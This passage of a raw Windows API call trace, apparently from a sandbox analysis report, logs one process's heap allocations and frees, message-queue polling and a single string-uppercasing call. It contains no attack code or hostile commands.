lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.124] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.124] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.124] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.125] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0177.126] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.126] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0177.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0177.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0177.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0177.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0177.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0177.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.128] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0177.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.130] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0177.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0177.134] 